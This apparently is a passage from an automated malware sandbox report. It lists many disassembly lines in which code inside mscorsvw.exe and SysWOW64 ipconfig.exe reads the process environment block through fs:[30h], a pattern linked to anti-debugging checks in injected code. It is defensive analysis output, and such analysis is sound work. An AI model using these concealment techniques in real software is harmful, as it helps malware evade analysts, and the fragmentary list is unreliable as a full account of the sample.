Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05767016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05767016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0577B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057290AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056E9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05763884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05763884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05713B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05713B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056EF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057A131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057103E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0570DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057653CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057653CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05714BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05714BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05714BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057B5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_056F1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0571B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05712397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0579D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0572927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0579B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0579B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05774257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05724A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05724A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05703A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03493B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03493B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03471B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03471B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03535BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0351B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0352AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03478A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03483A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03465210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03484120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0346B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03492990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03480050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03480050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03522073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03531074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03534015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03534015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03469080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0347FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03538F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0353070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0353070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0348F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03464F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03464F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_0349E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03478794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_03477E41 mov eax, dword ptr fs:[00000030h]
